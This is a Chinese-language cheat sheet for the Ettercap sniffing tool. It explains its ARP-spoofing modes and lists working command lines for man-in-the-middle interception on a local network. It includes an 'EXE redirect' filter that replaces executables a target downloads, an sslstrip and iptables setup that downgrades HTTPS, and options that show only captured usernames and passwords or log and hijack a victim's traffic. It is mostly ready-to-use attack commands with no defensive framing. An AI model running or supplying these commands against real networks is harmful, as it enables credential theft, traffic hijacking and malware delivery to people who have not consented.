Ettercap-嗅探神器

Ettercap有5种sniffing工作方式：

1、IPBASED

在基于IP地址的sniffing方式下，Ettercap将根据源IP-PORT和目的IP-PORT来捕获数据包。

2、MACBASED

在基于MAC地址的方式下，Ettercap将根据源MAC和目的MAC来捕获数##### 据包（在捕获通过网关的数据包时，这种方式很有用）

3、ARPBASED

在基于ARP欺骗的方式下，Ettercap利用ARP欺骗在交换局域网内监听两个主机之间的通信（全双工）。

4、SMARTARP

在SMARTARP方式下，Ettercap利用ARP欺骗，监听交换网上某台主机与所有已知的其他主机（存在于主机表中的主机）之间的通信（全双工）。

5、PUBLICARP

在PUBLICARP 方式下，Ettercap利用ARP欺骗，监听交换网上某台主机与所有其它主机之间的通信（半双工）。此方式以广播方式发送ARP响应，但是如果 Ettercap已经拥有了完整的主机地址表（或在Ettercap启动时已经对LAN上的主机进行了扫描），Ettercap会自动选取 SMARTARP方式，而且ARP响应会发送给被监听主机之外的所有主机，以避免在Win2K上出现IP地址冲突的消息。

嗅探

ettercap -i wlan0 -T -q -M arp:remote /192.168.1.211// /192.168.1.119//
ettercap -i wlan0 -T -q -M arp:remote /// ///

-P 使用插件
-T 使用基于文本界面
-q 启动安静模式（不回显）
-M 启动ARP欺骗攻击

EXE重定向

etterfilter exe.filter -o exe.ef
ettercap -T -q -i wlan0 -F exe.ef -M ARP /// /192.168.1.211（目标IP）// -P autoadd

嗅探SSL

echo “1”>/proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
sslstrip -l 10000

下面列出几个常用的参数组合：
ettercap -Tzq
以命令行方式显示，只嗅探本地数据包，只显示捕捉到的用户名和密码以及其他信息。
ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.2-10/
嗅探网关（192.168.1.1）与部分主机（192.168.1.2-10）之间相互通信的数据包。
ettercap -Tzq //110
只嗅探本机110端口（pop3）的信息
ettercap -Tzq /10.0.0.1/21,22,23
只嗅探本机与10.0.0.1主机在端口21、22、23上的通信
ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /10.1.1.2/80 //
在eth0网卡上用自己的filter嗅探ip为10.1.1.2主机在80端口上的所有通信，并把所有的数据包保存成文件名为“sniffed_data”的文件
ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /10.1.1.1/ /10.1.1.2/
单向欺骗路由，只劫持路由发向10.1.1.2的数据包。